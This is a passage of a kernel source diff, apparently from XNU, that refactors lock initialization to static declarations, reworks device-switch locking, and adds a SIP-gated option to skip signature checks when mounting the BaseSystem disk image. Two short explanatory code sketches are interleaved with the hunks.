-lck_grp_t *mt_lock_grp = NULL;
+LCK_GRP_DECLARE(mt_lock_grp, MT_NODE);
 static int mt_dev_major;
 
 static mt_device_t
@@ -96,9 +96,6 @@ mt_device_assert_inuse(__assert_only mt_device_t dev)
 int
 mt_dev_init(void)
 {
-       mt_lock_grp = lck_grp_alloc_init(MT_NODE, LCK_GRP_ATTR_NULL);
-       assert(mt_lock_grp != NULL);
-
        mt_dev_major = cdevsw_add(-1 /* allocate a major number */, &mt_cdevsw);
        if (mt_dev_major < 0) {
                panic("monotonic: cdevsw_add failed: %d", mt_dev_major);
@@ -123,7 +120,7 @@ mt_dev_init(void)
                        __builtin_unreachable();
                }
 
-               lck_mtx_init(&mt_devices[i].mtd_lock, mt_lock_grp, LCK_ATTR_NULL);
+               lck_mtx_init(&mt_devices[i].mtd_lock, &mt_lock_grp, LCK_ATTR_NULL);
        }
 
        return 0;
index ced3cded223010e1ba96e64b24f8e59faa451a3f..800757bf53f39f98a2a9f87e549f64ff52b1f43f 100644 (file)
@@ -547,6 +547,12 @@ munge_llllll(void *args __unused)
        /* Nothing to do, already all 64-bit */
 }
 
+void
+munge_llll(void *args __unused)
+{
+       /* Nothing to do, already all 64-bit */
+}
+
 void
 munge_ll(void *args __unused)
 {
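
For contrast with the empty munge_llll() added above, the sketch below shows, with invented names, what a munge routine has to do when 32-bit user arguments must be widened in place to the kernel's 64-bit argument slots. It is illustrative only and not a routine from this file; munge_llll() is a no-op because on 64-bit targets every 'l' argument already occupies a full 64-bit slot.

#include <stdint.h>

static void
example_munge_www(void *args)
{
	uint64_t *out_args = (uint64_t *)args;
	const uint32_t *in_args = (const uint32_t *)args;

	/* Expand back to front so no input word is overwritten before it is read. */
	out_args[2] = in_args[2];
	out_args[1] = in_args[1];
	out_args[0] = in_args[0];
}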
index c204382af4073b140f9f30bccbcea20f21d6e337..6dd42a5f0e71dcc7ecfd2fd43b297ad7d5e0a9cd 100644 (file)
 #include <dev/busvar.h>                 /* for pseudo_inits */
 #include <sys/kdebug.h>
 #include <sys/monotonic.h>
-#include <sys/reason.h>
 
 #include <mach/mach_types.h>
 #include <mach/vm_prot.h>
 #include <mach/semaphore.h>
 #include <mach/sync_policy.h>
 #include <kern/clock.h>
+#include <sys/csr.h>
 #include <mach/kern_return.h>
 #include <mach/thread_act.h>            /* for thread_resume() */
 #include <sys/mcache.h>                 /* for mcache_init() */
 #include <net/if_gif.h>                 /* for gif_init() */
 #include <miscfs/devfs/devfsdefs.h>     /* for devfs_kernel_mount() */
 #include <vm/vm_kern.h>                 /* for kmem_suballoc() */
-#include <sys/semaphore.h>              /* for psem_lock_init() */
 #include <sys/msgbuf.h>                 /* for log_setsize() */
-#include <sys/tty.h>                    /* for tty_init() */
 #include <sys/proc_uuid_policy.h>       /* proc_uuid_policy_init() */
 #include <netinet/flow_divert.h>        /* flow_divert_init() */
 #include <net/content_filter.h>         /* for cfil_init() */
@@ -231,17 +229,17 @@ int nswapmap;
 void *swapmap;
 struct swdevt swdevt[1];
 
+static LCK_GRP_DECLARE(hostname_lck_grp, "hostname");
+LCK_MTX_DECLARE(hostname_lock, &hostname_lck_grp);
+LCK_MTX_DECLARE(domainname_lock, &hostname_lck_grp);
+
 dev_t   rootdev;                /* device of the root */
 dev_t   dumpdev;                /* device to take dumps on */
 long    dumplo;                 /* offset into dumpdev */
 long    hostid;
 char    hostname[MAXHOSTNAMELEN];
-lck_mtx_t hostname_lock;
-lck_grp_t *hostname_lck_grp;
 char    domainname[MAXDOMNAMELEN];
-lck_mtx_t domainname_lock;
-
-char rootdevice[DEVMAXNAMESIZE];
+char    rootdevice[DEVMAXNAMESIZE];
 
 struct  vnode *rootvp;
 bool rootvp_is_ssd = false;
@@ -259,20 +257,14 @@ int legacy_footprint_entitlement_mode = LEGACY_FOOTPRINT_ENTITLEMENT_IGNORE;
 __private_extern__ int proc_ref_tracking_disabled = 0; /* disable panics on leaked proc refs across syscall boundary */
 #endif
 
-#if OS_REASON_DEBUG
-__private_extern__ int os_reason_debug_disabled = 0; /* disable asserts for when we fail to allocate OS reasons */
-#endif
-
 extern kern_return_t IOFindBSDRoot(char *, unsigned int, dev_t *, u_int32_t *);
 extern void IOSecureBSDRoot(const char * rootName);
 extern kern_return_t IOKitBSDInit(void );
 extern boolean_t IOSetRecoveryBoot(bsd_bootfail_mode_t, uuid_t, boolean_t);
 extern void kminit(void);
-extern void file_lock_init(void);
 extern void bsd_bufferinit(void);
 extern void oslog_setsize(int size);
 extern void throttle_init(void);
-extern void acct_init(void);
 
 #if CONFIG_LOCKERBOOT
 #define LOCKER_PROTOBOOT_MOUNT "/protoboot"
@@ -339,14 +331,13 @@ static void parse_bsd_args(void);
 #if CONFIG_DEV_KMEM
 extern void dev_kmem_init(void);
 #endif
-extern void time_zone_slock_init(void);
 extern void select_waitq_init(void);
 static void process_name(const char *, proc_t);
 
 static void setconf(void);
 
 #if CONFIG_BASESYSTEMROOT
-static int bsd_find_basesystem_dmg(char *bsdmgpath_out, bool *rooted_dmg);
+static int bsd_find_basesystem_dmg(char *bsdmgpath_out, bool *rooted_dmg, bool *skip_signature_check);
 static boolean_t bsdmgroot_bootable(void);
 #endif // CONFIG_BASESYSTEMROOT
 
@@ -411,25 +402,18 @@ extern struct os_refgrp rlimit_refgrp;
 extern thread_t cloneproc(task_t, coalition_t, proc_t, int, int);
 extern int      (*mountroot)(void);
 
-lck_grp_t * proc_lck_grp;
-lck_grp_t * proc_slock_grp;
-lck_grp_t * proc_fdmlock_grp;
-lck_grp_t * proc_kqhashlock_grp;
-lck_grp_t * proc_knhashlock_grp;
-lck_grp_t * proc_ucred_mlock_grp;
-lck_grp_t * proc_mlock_grp;
-lck_grp_t * proc_dirslock_grp;
-lck_grp_attr_t * proc_lck_grp_attr;
-lck_attr_t * proc_lck_attr;
-lck_mtx_t * proc_list_mlock;
-lck_mtx_t * proc_klist_mlock;
+LCK_ATTR_DECLARE(proc_lck_attr, 0, 0);
+LCK_GRP_DECLARE(proc_lck_grp, "proc");
+LCK_GRP_DECLARE(proc_slock_grp, "proc-slock");
+LCK_GRP_DECLARE(proc_fdmlock_grp, "proc-fdmlock");
+LCK_GRP_DECLARE(proc_mlock_grp, "proc-mlock");
+LCK_GRP_DECLARE(proc_ucred_mlock_grp, "proc-ucred-mlock");
+LCK_GRP_DECLARE(proc_dirslock_grp, "proc-dirslock");
+LCK_GRP_DECLARE(proc_kqhashlock_grp, "proc-kqhashlock");
+LCK_GRP_DECLARE(proc_knhashlock_grp, "proc-knhashlock");
 
-#if CONFIG_XNUPOST
-lck_grp_t * sysctl_debug_test_stackshot_owner_grp;
-lck_mtx_t * sysctl_debug_test_stackshot_owner_init_mtx;
-#endif /* !CONFIG_XNUPOST */
 
-extern lck_mtx_t * execargs_cache_lock;
+LCK_MTX_DECLARE_ATTR(proc_list_mlock, &proc_mlock_grp, &proc_lck_attr);
 
 #if XNU_TARGET_OS_OSX
 /* hook called after root is mounted XXX temporary hack */
@@ -438,7 +422,7 @@ void (*unmountroot_pre_hook)(void);
 #endif
 void set_rootvnode(vnode_t);
 
-extern lck_rw_t rootvnode_rw_lock;
+extern lck_rw_t rootvnode_rw_lock;
 
 /* called with an iocount and usecount on new_rootvnode */
 void
@@ -486,17 +470,6 @@ bsd_rooted_ramdisk(void)
        return is_ramdisk;
 }
 
-/*
- * This function is called before IOKit initialization, so that globals
- * like the sysctl tree are initialized before kernel extensions
- * are started (since they may want to register sysctls
- */
-void
-bsd_early_init(void)
-{
-       sysctl_early_init();
-}
-
 /*
  * This function is called very early on in the Mach startup, from the
  * function start_kernel_threads() in osfmk/kern/startup.c.  It's called
@@ -562,9 +535,6 @@ bsd_init(void)
        bsd_init_kprintf("calling procinit\n");
        procinit();
 
-       /* Initialize the ttys (MUST be before kminit()/bsd_autoconf()!)*/
-       tty_init();
-
        /* kernel_task->proc = kernproc; */
        set_bsdtask_info(kernel_task, (void *)kernproc);
 
@@ -572,38 +542,15 @@ bsd_init(void)
        bsd_init_kprintf("calling process_name\n");
        process_name("kernel_task", kernproc);
 
-       /* allocate proc lock group attribute and group */
-       bsd_init_kprintf("calling lck_grp_attr_alloc_init\n");
-       proc_lck_grp_attr = lck_grp_attr_alloc_init();
-
-       proc_lck_grp = lck_grp_alloc_init("proc", proc_lck_grp_attr);
-
-       proc_slock_grp = lck_grp_alloc_init("proc-slock", proc_lck_grp_attr);
-       proc_ucred_mlock_grp = lck_grp_alloc_init("proc-ucred-mlock", proc_lck_grp_attr);
-       proc_mlock_grp = lck_grp_alloc_init("proc-mlock", proc_lck_grp_attr);
-       proc_fdmlock_grp = lck_grp_alloc_init("proc-fdmlock", proc_lck_grp_attr);
-       proc_kqhashlock_grp = lck_grp_alloc_init("proc-kqhashlock", proc_lck_grp_attr);
-       proc_knhashlock_grp = lck_grp_alloc_init("proc-knhashlock", proc_lck_grp_attr);
-       proc_dirslock_grp = lck_grp_alloc_init("proc-dirslock", proc_lck_grp_attr);
-#if CONFIG_XNUPOST
-       sysctl_debug_test_stackshot_owner_grp = lck_grp_alloc_init("test-stackshot-owner-grp", LCK_GRP_ATTR_NULL);
-       sysctl_debug_test_stackshot_owner_init_mtx = lck_mtx_alloc_init(
-               sysctl_debug_test_stackshot_owner_grp,
-               LCK_ATTR_NULL);
-#endif /* !CONFIG_XNUPOST */
        /* Allocate proc lock attribute */
-       proc_lck_attr = lck_attr_alloc_init();
 
-       proc_list_mlock = lck_mtx_alloc_init(proc_mlock_grp, proc_lck_attr);
-       proc_klist_mlock = lck_mtx_alloc_init(proc_mlock_grp, proc_lck_attr);
-       lck_mtx_init(&kernproc->p_mlock, proc_mlock_grp, proc_lck_attr);
-       lck_mtx_init(&kernproc->p_fdmlock, proc_fdmlock_grp, proc_lck_attr);
-       lck_mtx_init(&kernproc->p_ucred_mlock, proc_ucred_mlock_grp, proc_lck_attr);
-       lck_spin_init(&kernproc->p_slock, proc_slock_grp, proc_lck_attr);
-       lck_rw_init(&kernproc->p_dirs_lock, proc_dirslock_grp, proc_lck_attr);
+       lck_mtx_init(&kernproc->p_mlock, &proc_mlock_grp, &proc_lck_attr);
+       lck_mtx_init(&kernproc->p_fdmlock, &proc_fdmlock_grp, &proc_lck_attr);
+       lck_mtx_init(&kernproc->p_ucred_mlock, &proc_ucred_mlock_grp, &proc_lck_attr);
+       lck_spin_init(&kernproc->p_slock, &proc_slock_grp, &proc_lck_attr);
+       lck_rw_init(&kernproc->p_dirs_lock, &proc_dirslock_grp, &proc_lck_attr);
 
        assert(bsd_simul_execs != 0);
-       execargs_cache_lock = lck_mtx_alloc_init(proc_lck_grp, proc_lck_attr);
        execargs_cache_size = bsd_simul_execs;
        execargs_free_count = bsd_simul_execs;
        execargs_cache = zalloc_permanent(bsd_simul_execs * sizeof(vm_offset_t),
@@ -634,10 +581,6 @@ bsd_init(void)
 
        ulock_initialize();
 
-       hostname_lck_grp = lck_grp_alloc_init("hostname", LCK_GRP_ATTR_NULL);
-       lck_mtx_init(&hostname_lock, hostname_lck_grp, LCK_ATTR_NULL);
-       lck_mtx_init(&domainname_lock, hostname_lck_grp, LCK_ATTR_NULL);
-
        /*
         * Create process 0.
         */
@@ -646,7 +589,7 @@ bsd_init(void)
        kernproc->p_pgrp = &pgrp0;
        LIST_INSERT_HEAD(PGRPHASH(0), &pgrp0, pg_hash);
        LIST_INIT(&pgrp0.pg_members);
-       lck_mtx_init(&pgrp0.pg_mlock, proc_mlock_grp, proc_lck_attr);
+       lck_mtx_init(&pgrp0.pg_mlock, &proc_mlock_grp, &proc_lck_attr);
        /* There is no other bsd thread at this point and it is safe without the pgrp lock */
        LIST_INSERT_HEAD(&pgrp0.pg_members, kernproc, p_pglist);
        kernproc->p_listflag |= P_LIST_INPGRP;
@@ -659,7 +602,7 @@ bsd_init(void)
        session0.s_count = 1;
        session0.s_leader = kernproc;
        session0.s_listflags = 0;
-       lck_mtx_init(&session0.s_mlock, proc_mlock_grp, proc_lck_attr);
+       lck_mtx_init(&session0.s_mlock, &proc_mlock_grp, &proc_lck_attr);
        LIST_INSERT_HEAD(SESSHASH(0), &session0, s_hash);
        proc_list_unlock();
 
@@ -729,9 +672,6 @@ bsd_init(void)
        TAILQ_INIT(&kernproc->p_aio_doneq);
        kernproc->p_aio_total_count = 0;
 
-       bsd_init_kprintf("calling file_lock_init\n");
-       file_lock_init();
-
 #if CONFIG_MACF
        mac_cred_label_associate_kernel(kernproc->p_ucred);
 #endif
@@ -743,8 +683,8 @@ bsd_init(void)
        filedesc0.fd_knlist = NULL;
        filedesc0.fd_knhash = NULL;
        filedesc0.fd_knhashmask = 0;
-       lck_mtx_init(&filedesc0.fd_kqhashlock, proc_kqhashlock_grp, proc_lck_attr);
-       lck_mtx_init(&filedesc0.fd_knhashlock, proc_knhashlock_grp, proc_lck_attr);
+       lck_mtx_init(&filedesc0.fd_kqhashlock, &proc_kqhashlock_grp, &proc_lck_attr);
+       lck_mtx_init(&filedesc0.fd_knhashlock, &proc_knhashlock_grp, &proc_lck_attr);
 
        /* Create the limits structures. */
        kernproc->p_limit = &limit0;
@@ -792,9 +732,6 @@ bsd_init(void)
                }
        }
 
-       bsd_init_kprintf("calling fpxlog_init\n");
-       fpxlog_init();
-
        /*
         * Initialize buffers and hash links for buffers
         *
@@ -815,10 +752,6 @@ bsd_init(void)
        bsd_init_kprintf("calling vfsinit\n");
        vfsinit();
 
-       /* Initialize file locks. */
-       bsd_init_kprintf("calling lf_init\n");
-       lf_init();
-
 #if CONFIG_PROC_UUID_POLICY
        /* Initial proc_uuid_policy subsystem */
        bsd_init_kprintf("calling proc_uuid_policy_init()\n");
@@ -857,34 +790,12 @@ bsd_init(void)
        bsd_init_kprintf("calling aio_init\n");
        aio_init();
 
-       /* Initialize SysV shm subsystem locks; the subsystem proper is
-        * initialized through a sysctl.
-        */
-#if SYSV_SHM
-       bsd_init_kprintf("calling sysv_shm_lock_init\n");
-       sysv_shm_lock_init();
-#endif
-#if SYSV_SEM
-       bsd_init_kprintf("calling sysv_sem_lock_init\n");
-       sysv_sem_lock_init();
-#endif
-#if SYSV_MSG
-       bsd_init_kprintf("sysv_msg_lock_init\n");
-       sysv_msg_lock_init();
-#endif
-       bsd_init_kprintf("calling pshm_lock_init\n");
-       pshm_lock_init();
-       bsd_init_kprintf("calling psem_lock_init\n");
-       psem_lock_init();
-
        pthread_init();
        /* POSIX Shm and Sem */
        bsd_init_kprintf("calling pshm_cache_init\n");
        pshm_cache_init();
        bsd_init_kprintf("calling psem_cache_init\n");
        psem_cache_init();
-       bsd_init_kprintf("calling time_zone_slock_init\n");
-       time_zone_slock_init();
        bsd_init_kprintf("calling select_waitq_init\n");
        select_waitq_init();
 
@@ -920,6 +831,10 @@ bsd_init(void)
        kernproc->p_fd->fd_cdir = NULL;
        kernproc->p_fd->fd_rdir = NULL;
 
+#if defined (__x86_64__) && (DEBUG || DEVELOPMENT)
+       hvg_bsd_init();
+#endif /* DEBUG || DEVELOPMENT */
+
 #if CONFIG_FREEZE
 #ifndef CONFIG_MEMORYSTATUS
     #error "CONFIG_FREEZE defined without matching CONFIG_MEMORYSTATUS"
@@ -935,18 +850,12 @@ bsd_init(void)
        memorystatus_init();
 #endif /* CONFIG_MEMORYSTATUS */
 
-       bsd_init_kprintf("calling acct_init\n");
-       acct_init();
-
        bsd_init_kprintf("calling sysctl_mib_init\n");
        sysctl_mib_init();
 
        bsd_init_kprintf("calling bsd_autoconf\n");
        bsd_autoconf();
 
-       bsd_init_kprintf("calling os_reason_init\n");
-       os_reason_init();
-
 #if CONFIG_DTRACE
        dtrace_postinit();
 #endif
@@ -1057,9 +966,9 @@ bsd_init(void)
        (void)vnode_ref(init_rootvnode);
        (void)vnode_put(init_rootvnode);
 
-       lck_rw_lock_exclusive(rootvnode_rw_lock);
+       lck_rw_lock_exclusive(&rootvnode_rw_lock);
        set_rootvnode(init_rootvnode);
-       lck_rw_unlock_exclusive(rootvnode_rw_lock);
+       lck_rw_unlock_exclusive(&rootvnode_rw_lock);
        init_rootvnode = NULLVP;  /* use rootvnode after this point */
 
 
@@ -1176,6 +1085,7 @@ bsd_init(void)
        if (bsdmgroot_bootable()) {
                int error;
                bool rooted_dmg = false;
+               bool skip_signature_check = false;
 
                printf("trying to find and mount BaseSystem dmg as root volume\n");
 #if DEVELOPMENT || DEBUG
@@ -1188,7 +1098,7 @@ bsd_init(void)
                        panic("%s: M_NAMEI zone exhausted", __FUNCTION__);
                }
 
-               error = bsd_find_basesystem_dmg(dmgpath, &rooted_dmg);
+               error = bsd_find_basesystem_dmg(dmgpath, &rooted_dmg, &skip_signature_check);
                if (error) {
                        bsd_init_kprintf("failed to to find BaseSystem dmg: error = %d\n", error);
                } else {
@@ -1196,7 +1106,7 @@ bsd_init(void)
 
                        bsd_init_kprintf("found BaseSystem dmg at: %s\n", dmgpath);
 
-                       error = imageboot_pivot_image(dmgpath, IMAGEBOOT_DMG, "/System/Volumes/BaseSystem", "System/Volumes/macOS", rooted_dmg);
+                       error = imageboot_pivot_image(dmgpath, IMAGEBOOT_DMG, "/System/Volumes/BaseSystem", "System/Volumes/macOS", rooted_dmg, skip_signature_check);
                        if (error) {
                                bsd_init_kprintf("couldn't mount BaseSystem dmg: error = %d", error);
                        }
@@ -1246,9 +1156,6 @@ bsd_init(void)
        consider_zone_gc(FALSE);
 #endif
 
-       /* Initialize System Override call */
-       init_system_override();
-
        bsd_init_kprintf("done\n");
 }
 
@@ -1361,6 +1268,9 @@ bsd_utaskbootstrap(void)
                panic("bsd_utaskbootstrap: initproc not set\n");
        }
 #endif
+
+       zalloc_first_proc_made();
+
        /*
         * Since we aren't going back out the normal way to our parent,
         * we have to drop the transition locks explicitly.
@@ -1475,12 +1385,6 @@ parse_bsd_args(void)
        }
 #endif
 
-#if OS_REASON_DEBUG
-       if (PE_parse_boot_argn("-disable_osreason_debug", namep, sizeof(namep))) {
-               os_reason_debug_disabled = 1;
-       }
-#endif
-
        PE_parse_boot_argn("sigrestrict", &sigrestrict_arg, sizeof(sigrestrict_arg));
 
 #if DEVELOPMENT || DEBUG
@@ -1585,20 +1489,26 @@ extern const char *IOGetBootObjectsPath(void);
 // BaseSystem.dmg into its argument (which must be a char[MAXPATHLEN]).
 static
 int
-bsd_find_basesystem_dmg(char *bsdmgpath_out, bool *rooted_dmg)
+bsd_find_basesystem_dmg(char *bsdmgpath_out, bool *rooted_dmg, bool *skip_signature_check)
 {
        int error;
        size_t len;
        char *dmgbasepath;
        char *dmgpath;
+       bool allow_rooted_dmg = false;
 
        dmgbasepath = zalloc_flags(ZV_NAMEI, Z_ZERO | Z_WAITOK);
        dmgpath = zalloc_flags(ZV_NAMEI, Z_ZERO | Z_WAITOK);
        vnode_t imagevp = NULLVP;
 
+#if DEVELOPMENT || DEBUG
+       allow_rooted_dmg = true;
+#endif
+
        //must provide output bool
-       if (rooted_dmg) {
+       if (rooted_dmg && skip_signature_check) {
                *rooted_dmg = false;
+               *skip_signature_check = false;
        } else {
                error = EINVAL;
                goto done;
@@ -1615,6 +1525,11 @@ bsd_find_basesystem_dmg(char *bsdmgpath_out, bool *rooted_dmg)
                goto done;
        }
 
+       if (csr_check(CSR_ALLOW_ANY_RECOVERY_OS) == 0) {
+               *skip_signature_check = true;
+               allow_rooted_dmg = true;
+       }
+
 #if defined(__arm64__)
        const char *boot_obj_path = IOGetBootObjectsPath();
        if (boot_obj_path) {
@@ -1634,26 +1549,27 @@ bsd_find_basesystem_dmg(char *bsdmgpath_out, bool *rooted_dmg)
                        goto done;
                }
 
-#if DEVELOPMENT || DEBUG
-               len = strlcpy(dmgpath, dmgbasepath, MAXPATHLEN);
-               if (len > MAXPATHLEN) {
-                       error = ENAMETOOLONG;
-                       goto done;
-               }
+               if (allow_rooted_dmg) {
+                       len = strlcpy(dmgpath, dmgbasepath, MAXPATHLEN);
+                       if (len > MAXPATHLEN) {
+                               error = ENAMETOOLONG;
+                               goto done;
+                       }
 
-               len = strlcat(dmgpath, "arm64eBaseSystem.rooted.dmg", MAXPATHLEN);
-               if (len > MAXPATHLEN) {
-                       error = ENAMETOOLONG;
-                       goto done;
-               }
+                       len = strlcat(dmgpath, "arm64eBaseSystem.rooted.dmg", MAXPATHLEN);
+                       if (len > MAXPATHLEN) {
+                               error = ENAMETOOLONG;
+                               goto done;
+                       }
 
-               error = vnode_lookup(dmgpath, 0, &imagevp, vfs_context_kernel());
-               if (error == 0) {
-                       *rooted_dmg = true;
-                       goto done;
+                       error = vnode_lookup(dmgpath, 0, &imagevp, vfs_context_kernel());
+                       if (error == 0) {
+                               *rooted_dmg = true;
+                               *skip_signature_check = true;
+                               goto done;
+                       }
+                       memset(dmgpath, 0, MAXPATHLEN);
                }
-               memset(dmgpath, 0, MAXPATHLEN);
-#endif  // DEVELOPMENT || DEBUG
 
                len = strlcpy(dmgpath, dmgbasepath, MAXPATHLEN);
                if (len > MAXPATHLEN) {
@@ -1688,27 +1604,28 @@ bsd_find_basesystem_dmg(char *bsdmgpath_out, bool *rooted_dmg)
                goto done;
        }
 
-#if DEVELOPMENT || DEBUG
-       // Try BaseSystem.rooted.dmg
-       len = strlcpy(dmgpath, dmgbasepath, MAXPATHLEN);
-       if (len > MAXPATHLEN) {
-               error = ENAMETOOLONG;
-               goto done;
-       }
+       if (allow_rooted_dmg) {
+               // Try BaseSystem.rooted.dmg
+               len = strlcpy(dmgpath, dmgbasepath, MAXPATHLEN);
+               if (len > MAXPATHLEN) {
+                       error = ENAMETOOLONG;
+                       goto done;
+               }
 
-       len = strlcat(dmgpath, "/BaseSystem.rooted.dmg", MAXPATHLEN);
-       if (len > MAXPATHLEN) {
-               error = ENAMETOOLONG;
-               goto done;
-       }
+               len = strlcat(dmgpath, "/BaseSystem.rooted.dmg", MAXPATHLEN);
+               if (len > MAXPATHLEN) {
+                       error = ENAMETOOLONG;
+                       goto done;
+               }
 
-       error = vnode_lookup(dmgpath, 0, &imagevp, vfs_context_kernel());
-       if (error == 0) {
-               // we found it! success!
-               *rooted_dmg = true;
-               goto done;
+               error = vnode_lookup(dmgpath, 0, &imagevp, vfs_context_kernel());
+               if (error == 0) {
+                       // we found it! success!
+                       *rooted_dmg = true;
+                       *skip_signature_check = true;
+                       goto done;
+               }
        }
-#endif // DEVELOPMENT || DEBUG
 
        // Try BaseSystem.dmg
        len = strlcpy(dmgpath, dmgbasepath, MAXPATHLEN);
index 3b8290fc5be72ed64f4e282a32bf395832ac9f90..a08f4c823d86ab2585b9f79ef00ef7814b7a38eb 100644 (file)
 
 /* XXX these should be in a common header somewhere, but aren't */
 extern int chrtoblk_set(int, int);
-extern vm_offset_t kmem_mb_alloc(vm_map_t, int, int, kern_return_t *);
 
 /* XXX most of these just exist to export; there's no good header for them*/
 void pcb_synch(void);
 
-TAILQ_HEAD(, devsw_lock) devsw_locks;
-lck_mtx_t devsw_lock_list_mtx;
-lck_grp_t * devsw_lock_grp;
+typedef struct devsw_lock {
+       TAILQ_ENTRY(devsw_lock) dl_list;
+       thread_t                dl_thread;
+       dev_t                   dl_dev;
+       int                     dl_mode;
+       int                     dl_waiters;
+} *devsw_lock_t;
+
+static LCK_GRP_DECLARE(devsw_lock_grp, "devsw");
+static LCK_MTX_DECLARE(devsw_lock_list_mtx, &devsw_lock_grp);
+static TAILQ_HEAD(, devsw_lock) devsw_locks = TAILQ_HEAD_INITIALIZER(devsw_locks);
 
 /* Just to satisfy pstat command */
 int dmmin, dmmax, dmtext;
 
-vm_offset_t
-kmem_mb_alloc(vm_map_t mbmap, int size, int physContig, kern_return_t *err)
-{
-       vm_offset_t addr = 0;
-       kern_return_t kr = KERN_SUCCESS;
-
-       if (!physContig) {
-               kr = kernel_memory_allocate(mbmap, &addr, size, 0, KMA_KOBJECT | KMA_LOMEM, VM_KERN_MEMORY_MBUF);
-       } else {
-               kr = kmem_alloc_contig(mbmap, &addr, size, PAGE_MASK, 0xfffff, 0, KMA_KOBJECT | KMA_LOMEM, VM_KERN_MEMORY_MBUF);
-       }
-
-       if (kr != KERN_SUCCESS) {
-               addr = 0;
-       }
-       if (err) {
-               *err = kr;
-       }
-
-       return addr;
-}
-
 /*
  * XXX this function only exists to be exported and do nothing.
  */
@@ -366,72 +351,84 @@ bsd_hostname(char *buf, size_t bufsize, size_t *len)
        return ret;
 }
 
+static devsw_lock_t
+devsw_lock_find_locked(dev_t dev, int mode)
+{
+       devsw_lock_t lock;
+
+       TAILQ_FOREACH(lock, &devsw_locks, dl_list) {
+               if (lock->dl_dev == dev && lock->dl_mode == mode) {
+                       return lock;
+               }
+       }
+
+       return NULL;
+}
+
 void
 devsw_lock(dev_t dev, int mode)
 {
-       devsw_lock_t newlock, tmplock;
-       int res;
+       devsw_lock_t newlock, curlock;
 
        assert(0 <= major(dev) && major(dev) < nchrdev);
        assert(mode == S_IFCHR || mode == S_IFBLK);
 
-       MALLOC(newlock, devsw_lock_t, sizeof(struct devsw_lock), M_TEMP, M_WAITOK | M_ZERO);
+       newlock = kalloc_flags(sizeof(struct devsw_lock), Z_WAITOK | Z_ZERO);
        newlock->dl_dev = dev;
        newlock->dl_thread = current_thread();
        newlock->dl_mode = mode;
 
        lck_mtx_lock_spin(&devsw_lock_list_mtx);
-retry:
-       TAILQ_FOREACH(tmplock, &devsw_locks, dl_list)
-       {
-               if (tmplock->dl_dev == dev && tmplock->dl_mode == mode) {
-                       res = msleep(tmplock, &devsw_lock_list_mtx, PVFS, "devsw_lock", NULL);
-                       assert(res == 0);
-                       goto retry;
-               }
+
+       curlock = devsw_lock_find_locked(dev, mode);
+       if (curlock == NULL) {
+               TAILQ_INSERT_TAIL(&devsw_locks, newlock, dl_list);
+       } else {
+               curlock->dl_waiters++;
+               lck_mtx_sleep_with_inheritor(&devsw_lock_list_mtx,
+                   LCK_SLEEP_SPIN, curlock, curlock->dl_thread,
+                   THREAD_UNINT | THREAD_WAIT_NOREPORT,
+                   TIMEOUT_WAIT_FOREVER);
+               assert(curlock->dl_thread == current_thread());
+               curlock->dl_waiters--;
        }
 
-       TAILQ_INSERT_TAIL(&devsw_locks, newlock, dl_list);
        lck_mtx_unlock(&devsw_lock_list_mtx);
+
+       if (curlock != NULL) {
+               kfree(newlock, sizeof(struct devsw_lock));
+       }
 }
+
 void
 devsw_unlock(dev_t dev, int mode)
 {
-       devsw_lock_t tmplock;
+       devsw_lock_t lock;
+       thread_t inheritor_thread = NULL;
 
        assert(0 <= major(dev) && major(dev) < nchrdev);
 
        lck_mtx_lock_spin(&devsw_lock_list_mtx);
 
-       TAILQ_FOREACH(tmplock, &devsw_locks, dl_list)
-       {
-               if (tmplock->dl_dev == dev && tmplock->dl_mode == mode) {
-                       break;
-               }
-       }
+       lock = devsw_lock_find_locked(dev, mode);
 
-       if (tmplock == NULL) {
-               panic("Trying to unlock, and couldn't find lock.");
+       if (lock == NULL || lock->dl_thread != current_thread()) {
+               panic("current thread doesn't own the lock (%p)", lock);
        }
 
-       if (tmplock->dl_thread != current_thread()) {
-               panic("Trying to unlock, but I don't hold the lock.");
+       if (lock->dl_waiters) {
+               wakeup_one_with_inheritor(lock, THREAD_AWAKENED,
+                   LCK_WAKE_DEFAULT, &lock->dl_thread);
+               inheritor_thread = lock->dl_thread;
+               lock = NULL;
+       } else {
+               TAILQ_REMOVE(&devsw_locks, lock, dl_list);
        }
 
-       wakeup(tmplock);
-       TAILQ_REMOVE(&devsw_locks, tmplock, dl_list);
-
        lck_mtx_unlock(&devsw_lock_list_mtx);
 
-       FREE(tmplock, M_TEMP);
-}
-
-void
-devsw_init()
-{
-       devsw_lock_grp = lck_grp_alloc_init("devsw", NULL);
-       assert(devsw_lock_grp != NULL);
-
-       lck_mtx_init(&devsw_lock_list_mtx, devsw_lock_grp, NULL);
-       TAILQ_INIT(&devsw_locks);
+       if (inheritor_thread) {
+               thread_deallocate(inheritor_thread);
+       }
+       kfree(lock, sizeof(struct devsw_lock));
 }
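
The rework above swaps the msleep()/wakeup() retry loop for the turnstile-aware lck_mtx_sleep_with_inheritor()/wakeup_one_with_inheritor() pair, so a waiter donates its priority to the holder and ownership is handed off directly to exactly one woken thread. A reduced sketch with illustrative names, assuming only the primitives used in the hunk:

#include <kern/assert.h>
#include <kern/locks.h>
#include <kern/thread.h>

struct gate {
	thread_t owner;
	int      waiters;
};

static LCK_GRP_DECLARE(gate_grp, "gate-example");
static LCK_MTX_DECLARE(gate_mtx, &gate_grp);

static void
gate_enter(struct gate *g)
{
	lck_mtx_lock_spin(&gate_mtx);
	if (g->owner == THREAD_NULL) {
		g->owner = current_thread();
	} else {
		g->waiters++;
		/* Sleep on the gate, donating priority to the current owner. */
		lck_mtx_sleep_with_inheritor(&gate_mtx, LCK_SLEEP_SPIN, g,
		    g->owner, THREAD_UNINT | THREAD_WAIT_NOREPORT,
		    TIMEOUT_WAIT_FOREVER);
		/* Direct hand-off: the waker installed us as the new owner. */
		assert(g->owner == current_thread());
		g->waiters--;
	}
	lck_mtx_unlock(&gate_mtx);
}

static void
gate_exit(struct gate *g)
{
	thread_t woken = THREAD_NULL;

	lck_mtx_lock_spin(&gate_mtx);
	if (g->waiters != 0) {
		/* Wake one waiter; it is written back as the new owner. */
		wakeup_one_with_inheritor(g, THREAD_AWAKENED, LCK_WAKE_DEFAULT,
		    &g->owner);
		woken = g->owner;
	} else {
		g->owner = THREAD_NULL;
	}
	lck_mtx_unlock(&gate_mtx);

	if (woken != THREAD_NULL) {
		/* wakeup_one_with_inheritor() returns a +1 thread reference. */
		thread_deallocate(woken);
	}
}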
diff --git a/bsd/kern/counter_test.c b/bsd/kern/counter_test.c
new file mode 100644 (file)
index 0000000..db9f8ee
--- /dev/null
@@ -0,0 +1,280 @@
+/*
